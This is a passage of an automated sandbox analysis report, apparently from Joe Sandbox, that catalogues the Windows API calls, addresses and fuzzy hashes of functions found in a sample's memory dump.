                                                                        • Instruction Fuzzy Hash: 2BC17E75A0022AEFCB14CF94D884BAEB7B9FF48700F114598E945EB295D730DE81DBA0
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0094AAB4
                                                                        • CoUninitialize.OLE32 ref: 0094AABF
                                                                          • Part of subcall function 00930213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0093027B
                                                                        • VariantInit.OLEAUT32(?), ref: 0094AACA
                                                                        • VariantClear.OLEAUT32(?), ref: 0094AD9D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                        • String ID:
                                                                        • API String ID: 780911581-0
                                                                        • Opcode ID: b95f2577690f2669f1d1898b2a0da9a1589efda7d144cfcceae21829b8d055ea
                                                                        • Instruction ID: 33f0283cbd3bd6142458d1027d3b74485620c98f6f4a6182e28e615dfbc78d9a
                                                                        • Opcode Fuzzy Hash: b95f2577690f2669f1d1898b2a0da9a1589efda7d144cfcceae21829b8d055ea
                                                                        • Instruction Fuzzy Hash: 13A124756447019FCB10DF28C491F2AB7E9BF88710F148849FA9A9B3A1DB34ED44CB86
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: 7a5f04add5f559e0c723bc5c7cd7e5f6925f8f71599e25a412063a64ec611d2a
                                                                        • Instruction ID: 7dab74a3ccc7b784e2b6bc44490a426ba060e4772faf8d1a240a923d1181daa1
                                                                        • Opcode Fuzzy Hash: 7a5f04add5f559e0c723bc5c7cd7e5f6925f8f71599e25a412063a64ec611d2a
                                                                        • Instruction Fuzzy Hash: E6519531604316DBDB34EF69E895B2EB3E9EF85314F20881FE596CB2E5DB7498808705
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 3877424927-0
                                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                        • Instruction ID: 3f0697fba27e0e7b4a9a40ac6b83ba5a15dad8398776b442d76814e595ee3a64
                                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                        • Instruction Fuzzy Hash: 555195B4B0030DEBDB249F6989856EE7BB9AF40360F24C769F825962D0D7759FD08B40
                                                                        APIs
                                                                        • GetWindowRect.USER32(01036170,?), ref: 0095C544
                                                                        • ScreenToClient.USER32(?,00000002), ref: 0095C574
                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0095C5DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMoveRectScreen
                                                                        • String ID:
                                                                        • API String ID: 3880355969-0
                                                                        • Opcode ID: 62f520762dbd81c1b9e9b82dd56aab95ca5d293b663a0a36a7395f5c7488fb8d
                                                                        • Instruction ID: cc785007a6e445974b87cf54a36083e027d56ff407713111200bfc321fce126c
                                                                        • Opcode Fuzzy Hash: 62f520762dbd81c1b9e9b82dd56aab95ca5d293b663a0a36a7395f5c7488fb8d
                                                                        • Instruction Fuzzy Hash: 18518FB5901209EFCF10DF69C880AAE77B9FF44721F208259F91597290E730ED85CB90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0092C462
                                                                        • __itow.LIBCMT ref: 0092C49C
                                                                          • Part of subcall function 0092C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0092C753
                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0092C505
                                                                        • __itow.LIBCMT ref: 0092C55A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 29b78010818d397c5171933a5a153e179c23bb4501ed45b6223dc22be47ff77a
                                                                        • Instruction ID: ddb65a4a458e0b7235a5d4505dfdcc737966448176e995792a8e9d0ed01f35cd
                                                                        • Opcode Fuzzy Hash: 29b78010818d397c5171933a5a153e179c23bb4501ed45b6223dc22be47ff77a
                                                                        • Instruction Fuzzy Hash: 52419671A0061D6BDF11EF68D851FFE7BB9EF45710F000019F605E7191DB74AA458B92
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00933966
                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00933982
                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009339EF
                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00933A4D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 47fc123bd96802a327dd59075a80a56d048015e6de040dddb08dcd289d124ce0
                                                                        • Instruction ID: a14f6fd3328f06f2bb354fce714e386e17eb45f4175360e0687cfa470cdb8642
                                                                        • Opcode Fuzzy Hash: 47fc123bd96802a327dd59075a80a56d048015e6de040dddb08dcd289d124ce0
                                                                        • Instruction Fuzzy Hash: D3412770E84208EEEF308B648806BFDBBB9AF95311F04815AF4C1962C1C7B48E85DF61
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0095B5D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 4d82b5da10a7b869bd27d1fccaf42350aaef7e9b121c739c8ace99c063f61625
                                                                        • Instruction ID: d768649aed93f3ecddac3e6745a30ef1b235fe2aac54f767c6fa8006b7a61113
                                                                        • Opcode Fuzzy Hash: 4d82b5da10a7b869bd27d1fccaf42350aaef7e9b121c739c8ace99c063f61625
                                                                        • Instruction Fuzzy Hash: 97310275612208BFEF28DF1ACC89FAC3768EB06322F604501FE11D61E1E734A9899B51
                                                                        APIs
                                                                        • ClientToScreen.USER32(?,?), ref: 0095D807
                                                                        • GetWindowRect.USER32(?,?), ref: 0095D87D
                                                                        • PtInRect.USER32(?,?,0095ED5A), ref: 0095D88D
                                                                        • MessageBeep.USER32(00000000), ref: 0095D8FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: 81784227a1c0cc234a383b91809bb789c7df7839f414a256b482a354201fabaf
                                                                        • Instruction ID: 6b5bf13d2f2536674001f1757db73c3c8a68a4881c5d2529a6345e75d942bbaf
                                                                        • Opcode Fuzzy Hash: 81784227a1c0cc234a383b91809bb789c7df7839f414a256b482a354201fabaf
                                                                        • Instruction Fuzzy Hash: E441E274A12209DFCB21DF5AC884B697BF5FF49322F1881A9EA14CF260D330E849DB40
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00933AB8
                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00933AD4
                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00933B34
                                                                        • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00933B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 7c5ee5cdca212b70b738e54bbef72e61216daf747d891f53ac6d67b361724fb6
                                                                        • Instruction ID: 9cfe16aca4721122140ac8120040c7443149b0ed028041df212cd9a4d47dd7f2
                                                                        • Opcode Fuzzy Hash: 7c5ee5cdca212b70b738e54bbef72e61216daf747d891f53ac6d67b361724fb6
                                                                        • Instruction Fuzzy Hash: 93316830A80248AEEF308B6488197FEFBB99F45321F04811AF481931D1C7748F85DF61
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00924038
                                                                        • __isleadbyte_l.LIBCMT ref: 00924066
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00924094
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009240CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 6567ce64ed10a2b03bfa768ed95f1328c69b07fa3222076a44cdb8d121cba5e5
                                                                        • Instruction ID: f8c403c02fa9c7b3efd0ced99b70cb067e6feb4761670b3b2ec46be4acf941a8
                                                                        • Opcode Fuzzy Hash: 6567ce64ed10a2b03bfa768ed95f1328c69b07fa3222076a44cdb8d121cba5e5
                                                                        • Instruction Fuzzy Hash: 9731D031644226EFDB21DF74E844BAA7BB9FF40310F154428EA658B1A4E731D8D0DB90
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00957CB9
                                                                          • Part of subcall function 00935F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00935F6F
                                                                          • Part of subcall function 00935F55: GetCurrentThreadId.KERNEL32 ref: 00935F76
                                                                          • Part of subcall function 00935F55: AttachThreadInput.USER32(00000000,?,0093781F), ref: 00935F7D
                                                                        • GetCaretPos.USER32(?), ref: 00957CCA
                                                                        • ClientToScreen.USER32(00000000,?), ref: 00957D03
                                                                        • GetForegroundWindow.USER32 ref: 00957D09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        • Opcode ID: b535532056966e6190352c712dacec9fff284b92ffb04244651b0ae4dc964959
                                                                        • Instruction ID: e41610b10d93b91ccfadf35ef38b4140994a362eacab4eacc8fe1f3efa0a74d8
                                                                        • Opcode Fuzzy Hash: b535532056966e6190352c712dacec9fff284b92ffb04244651b0ae4dc964959
                                                                        • Instruction Fuzzy Hash: F7311EB2900108AFDB10EFA5D845AEFFBF9EF98314F108466E815E3251DA319E45CFA0
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • GetCursorPos.USER32(?), ref: 0095F211
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0096E4C0,?,?,?,?,?), ref: 0095F226
                                                                        • GetCursorPos.USER32(?), ref: 0095F270
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0096E4C0,?,?,?), ref: 0095F2A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        • Opcode ID: 4a34427419b7ad57f7cc8d28699b8f64ecdb367563bd0e066747c0b372cda789
                                                                        • Instruction ID: 0e92eee02b80e18259bc0dc8d1c571a54d67d80e6a667dcd87081795b9845de7
                                                                        • Opcode Fuzzy Hash: 4a34427419b7ad57f7cc8d28699b8f64ecdb367563bd0e066747c0b372cda789
                                                                        • Instruction Fuzzy Hash: CC21DD79601018EFCB25CF95C868EEE7BB9EF49321F048069F9094B2A1D3309990EB90
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00944358
                                                                          • Part of subcall function 009443E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00944401
                                                                          • Part of subcall function 009443E2: InternetCloseHandle.WININET(00000000), ref: 0094449E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 1463438336-0
                                                                        • Opcode ID: a0d3f52d44a75f326167cfb4449dd02c784798488c48ac1da6c7eec2cef1824c
                                                                        • Instruction ID: 954edd8d216d61b12a189f01d513ddfca25cda85051d490097b5b85fb4912aa6
                                                                        • Opcode Fuzzy Hash: a0d3f52d44a75f326167cfb4449dd02c784798488c48ac1da6c7eec2cef1824c
                                                                        • Instruction Fuzzy Hash: E821D176205A05BBEB159F609D00FBBB7ADFF84B10F10401ABA1996650DB719820AB90
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00958AA6
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00958AC0
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00958ACE
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00958ADC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
                                                                        • API String ID: 2169480361-0
                                                                        • Opcode ID: 66013695e8cd876add71b7bb9d65cdab3714d89dddeb773b9372c3773898cd0c
                                                                        • Instruction ID: 81c948999f552e0ccf5f2f66fb62f022460e8eafda86114f17d3b12cb39f3b93
                                                                        • Opcode Fuzzy Hash: 66013695e8cd876add71b7bb9d65cdab3714d89dddeb773b9372c3773898cd0c
                                                                        • Instruction Fuzzy Hash: 7E11D031205115AFEB04AB29CC09FBB77ADFF85321F18411AF91AE72E1CB74AC448B91
                                                                        APIs
                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00948AE0
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00948AF2
                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00948AFF
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948B16
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastacceptselect
                                                                        • String ID:
                                                                        • API String ID: 385091864-0
                                                                        • Opcode ID: 28907ea9652b53f0ba0f3441d156f258b921aebed544bb09c53fc722a5ed2ded
                                                                        • Instruction ID: dafbb864d5932cf3e35eeeef04d95c01b0fe72416fa944d56a319907405cecd4
                                                                        • Opcode Fuzzy Hash: 28907ea9652b53f0ba0f3441d156f258b921aebed544bb09c53fc722a5ed2ded
                                                                        • Instruction Fuzzy Hash: 70217572A011249FC7159F69CC85E9EBBFCEF49350F0081AAF849E7291DB74DA858F90
                                                                        APIs
                                                                          • Part of subcall function 00931E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00930ABB,?,?,?,0093187A,00000000,000000EF,00000119,?,?), ref: 00931E77
                                                                          • Part of subcall function 00931E68: lstrcpyW.KERNEL32(00000000,?,?,00930ABB,?,?,?,0093187A,00000000,000000EF,00000119,?,?,00000000), ref: 00931E9D
                                                                          • Part of subcall function 00931E68: lstrcmpiW.KERNEL32(00000000,?,00930ABB,?,?,?,0093187A,00000000,000000EF,00000119,?,?), ref: 00931ECE
                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0093187A,00000000,000000EF,00000119,?,?,00000000), ref: 00930AD4
                                                                        • lstrcpyW.KERNEL32(00000000,?,?,0093187A,00000000,000000EF,00000119,?,?,00000000), ref: 00930AFA
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0093187A,00000000,000000EF,00000119,?,?,00000000), ref: 00930B2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: 65de8cc097dbc51bbbd8c25819791e4de5accabdd735375b6f731384f7ad4de3
                                                                        • Instruction ID: 238e5e2ed1fb69c10d197e04db2dcb1864c412a7a9286a2676c0851b5d30007f
                                                                        • Opcode Fuzzy Hash: 65de8cc097dbc51bbbd8c25819791e4de5accabdd735375b6f731384f7ad4de3
                                                                        • Instruction Fuzzy Hash: A2119636210305AFDB259F34DC55E7A77B8FF85354F80406AF809CB2A0EB719950DBA0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00922FB5
                                                                          • Part of subcall function 0091395C: __FF_MSGBANNER.LIBCMT ref: 00913973
                                                                          • Part of subcall function 0091395C: __NMSG_WRITE.LIBCMT ref: 0091397A
                                                                          • Part of subcall function 0091395C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,0090F507,?,0000000E), ref: 0091399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
